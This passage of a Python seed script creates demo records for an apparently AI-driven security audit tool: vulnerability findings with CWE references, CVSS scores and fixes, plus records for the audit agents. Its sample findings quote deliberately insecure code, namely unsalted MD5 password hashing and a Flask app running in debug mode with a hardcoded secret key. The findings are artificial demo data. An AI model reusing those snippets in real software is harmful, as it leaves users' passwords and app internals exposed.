API_KEY = "your-api-key-here" # 请替换为实际密钥
SECRET_KEY = "change-this-secret" # 请替换为随机字符串''',
"status": FindingStatus.FALSE_POSITIVE,
"is_verified": False,
"verification_method": "代码审查 - 确认为示例配置模板",
"verification_result": {"is_example": True, "reason": "File is .example template, not production config"},
"suggestion": "确保 .example 文件不被误用,在 .gitignore 中排除实际配置文件",
"ai_confidence": 0.85,
"tags": ["false-positive", "configuration"],
},
{
"vulnerability_type": VulnerabilityType.WEAK_CRYPTO,
"severity": VulnerabilitySeverity.MEDIUM,
"title": "使用不安全的 MD5 哈希算法存储密码",
"description": "密码哈希使用了已被破解的 MD5 算法,没有使用盐值,容易受到彩虹表攻击和暴力破解。",
"file_path": "app/utils/crypto.py",
"line_start": 8,
"line_end": 12,
"function_name": "hash_password",
"code_snippet": '''import hashlib
def hash_password(password):
# 危险:使用不安全的 MD5 且无盐值
return hashlib.md5(password.encode()).hexdigest()''',
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "代码审查 - 确认使用弱哈希算法",
"suggestion": "使用 bcrypt、Argon2 或 PBKDF2 等专门的密码哈希算法",
"fix_code": '''import bcrypt
def hash_password(password):
# 修复:使用 bcrypt 进行安全的密码哈希
salt = bcrypt.gensalt(rounds=12)
return bcrypt.hashpw(password.encode(), salt).decode()
def verify_password(password, hashed):
return bcrypt.checkpw(password.encode(), hashed.encode())''',
"references": [
{"type": "CWE", "id": "CWE-327", "url": "https://cwe.mitre.org/data/definitions/327.html"},
{"type": "CWE", "id": "CWE-916", "url": "https://cwe.mitre.org/data/definitions/916.html"},
],
"ai_confidence": 0.97,
"cvss_score": 6.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
"tags": ["cryptography", "password-storage", "md5"],
},
{
"vulnerability_type": "security_misconfiguration",
"severity": VulnerabilitySeverity.LOW,
"title": "生产环境启用了调试模式",
"description": "Flask 应用在生产环境中启用了调试模式,可能泄露敏感信息和允许远程代码执行。",
"file_path": "app/__init__.py",
"line_start": 25,
"line_end": 28,
"code_snippet": '''# 应用配置
app = Flask(__name__)
app.debug = True # 警告:生产环境应禁用
app.secret_key = 'development-key' # 警告:应使用安全密钥''',
"status": FindingStatus.NEEDS_REVIEW,
"is_verified": False,
"suggestion": "在生产环境中禁用调试模式,使用环境变量配置",
"fix_code": '''import os
app = Flask(__name__)
app.debug = os.environ.get('FLASK_DEBUG', 'False').lower() == 'true'
app.secret_key = os.environ.get('SECRET_KEY', os.urandom(24))''',
"references": [
{"type": "CWE", "id": "CWE-489", "url": "https://cwe.mitre.org/data/definitions/489.html"},
],
"ai_confidence": 0.88,
"cvss_score": 5.3,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"tags": ["configuration", "debug-mode", "information-disclosure"],
},
]
findings = []
for i, fdata in enumerate(findings_data):
verified_at = None
if fdata.get("is_verified"):
verified_at = task.started_at + timedelta(minutes=10 + i)
finding = AgentFinding(
id=str(uuid.uuid4()),
task_id=task.id,
vulnerability_type=fdata["vulnerability_type"],
severity=fdata["severity"],
title=fdata["title"],
description=fdata.get("description"),
file_path=fdata.get("file_path"),
line_start=fdata.get("line_start"),
line_end=fdata.get("line_end"),
function_name=fdata.get("function_name"),
code_snippet=fdata.get("code_snippet"),
source=fdata.get("source"),
sink=fdata.get("sink"),
dataflow_path=fdata.get("dataflow_path"),
status=fdata.get("status", FindingStatus.NEW),
is_verified=fdata.get("is_verified", False),
verification_method=fdata.get("verification_method"),
verification_result=fdata.get("verification_result"),
verified_at=verified_at,
has_poc=fdata.get("has_poc", False),
poc_code=fdata.get("poc_code"),
poc_description=fdata.get("poc_description"),
poc_steps=fdata.get("poc_steps"),
suggestion=fdata.get("suggestion"),
fix_code=fdata.get("fix_code"),
fix_description=fdata.get("fix_description"),
references=fdata.get("references"),
ai_explanation=fdata.get("ai_explanation"),
ai_confidence=fdata.get("ai_confidence"),
xai_what=fdata.get("xai_what"),
xai_why=fdata.get("xai_why"),
xai_how=fdata.get("xai_how"),
xai_impact=fdata.get("xai_impact"),
cvss_score=fdata.get("cvss_score"),
cvss_vector=fdata.get("cvss_vector"),
tags=fdata.get("tags"),
created_at=task.started_at + timedelta(minutes=5 + i),
)
finding.fingerprint = finding.generate_fingerprint()
findings.append(finding)
db.add(finding)
await db.flush()
print(f"✓ 创建了 {len(findings)} 个漏洞发现")
return findings
async def create_agent_tree_nodes(db: AsyncSession, task: AgentTask) -> list:
"""创建 Agent 树节点"""
nodes_data = [
{
"agent_id": "orchestrator-001",
"agent_name": "主控 Agent",
"agent_type": "orchestrator",
"parent_agent_id": None,
"depth": 0,
"task_description": "协调整体审计流程,分发子任务",
"knowledge_modules": ["security_patterns", "vulnerability_db"],
"status": "completed",
"result_summary": "成功协调完成安全审计,发现 8 个漏洞",
"findings_count": 8,
"iterations": 15,
"tokens_used": 12500,
"tool_calls": 25,
"duration_ms": 780000,
},
{
"agent_id": "analyzer-sql-001",
"agent_name": "SQL 注入分析 Agent",
"agent_type": "analyzer",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "检测和验证 SQL 注入漏洞",
"knowledge_modules": ["sql_injection_patterns", "database_security"],
"status": "completed",
"result_summary": "发现 1 个严重 SQL 注入漏洞并验证成功",
"findings_count": 1,
"iterations": 5,
"tokens_used": 8200,
"tool_calls": 18,
"duration_ms": 120000,
},
{
"agent_id": "analyzer-xss-001",
"agent_name": "XSS 分析 Agent",
"agent_type": "analyzer",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "检测和验证跨站脚本漏洞",
"knowledge_modules": ["xss_patterns", "frontend_security"],
"status": "completed",
"result_summary": "发现 1 个高危存储型 XSS 漏洞",
"findings_count": 1,
"iterations": 4,
"tokens_used": 6800,
"tool_calls": 12,
"duration_ms": 95000,
},
{
"agent_id": "analyzer-cmd-001",
"agent_name": "命令注入分析 Agent",
"agent_type": "analyzer",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "检测操作系统命令注入漏洞",
"knowledge_modules": ["command_injection_patterns", "shell_security"],
"status": "completed",
"result_summary": "发现 1 个严重命令注入漏洞",
"findings_count": 1,
"iterations": 4,
"tokens_used": 7100,
"tool_calls": 15,
"duration_ms": 110000,
},
{
"agent_id": "verifier-001",
"agent_name": "沙箱验证 Agent",
"agent_type": "verifier",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "在隔离沙箱中验证漏洞可利用性",
"knowledge_modules": ["exploitation_techniques", "poc_generation"],
"status": "completed",
"result_summary": "验证 6 个漏洞,排除 1 个误报",
"findings_count": 6,
"iterations": 8,
"tokens_used": 11080,
"tool_calls": 17,
"duration_ms": 180000,
},
]
nodes = []
for ndata in nodes_data:
node = AgentTreeNode(
id=str(uuid.uuid4()),
task_id=task.id,
agent_id=ndata["agent_id"],
agent_name=ndata["agent_name"],
agent_type=ndata["agent_type"],
parent_agent_id=ndata["parent_agent_id"],
depth=ndata["depth"],
task_description=ndata["task_description"],
knowledge_modules=ndata["knowledge_modules"],
status=ndata["status"],
result_summary=ndata["result_summary"],
findings_count=ndata["findings_count"],
iterations=ndata["iterations"],
tokens_used=ndata["tokens_used"],
tool_calls=ndata["tool_calls"],
duration_ms=ndata["duration_ms"],
created_at=task.started_at,
started_at=task.started_at + timedelta(seconds=10),
finished_at=task.completed_at,
)
nodes.append(node)
db.add(node)
await db.flush()
print(f"✓ 创建了 {len(nodes)} 个 Agent 树节点")
return nodes
async def main():
"""主函数"""
print("=" * 60)
print("创建 Agent 审计任务演示数据")
print("=" * 60)
# 创建数据库连接
engine = create_async_engine(settings.DATABASE_URL, echo=False, future=True)
async_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with async_session() as db:
try:
# 获取演示用户
result = await db.execute(select(User).where(User.email == "demo@example.com"))
demo_user = result.scalars().first()
if not demo_user:
print("❌ 未找到演示用户 (demo@example.com)")
print("请先运行应用初始化数据库")
return
print(f"使用演示用户: {demo_user.email}")
# 创建或获取演示项目
project = await get_or_create_demo_project(db, demo_user.id)
# 创建 Agent 任务
task = await create_agent_demo_task(db, project, demo_user.id)
# 创建事件流
await create_agent_events(db, task)
# 创建漏洞发现
await create_agent_findings(db, task)
# 创建 Agent 树节点
await create_agent_tree_nodes(db, task)
# 提交事务
await db.commit()
print("=" * 60)
print("✅ Agent 演示数据创建完成!")
print(f" 任务 ID: {task.id}")
print(f" 项目: {project.name}")
print(f" 发现漏洞: {task.findings_count}")
print(f" 严重程度分布:")
print(f" - Critical: {task.critical_count}")
print(f" - High: {task.high_count}")
print(f" - Medium: {task.medium_count}")
print(f" - Low: {task.low_count}")
print("=" * 60)
except Exception as e:
await db.rollback()
print(f"❌ 创建失败: {e}")
import traceback
traceback.print_exc()
raise
if __name__ == "__main__":
asyncio.run(main())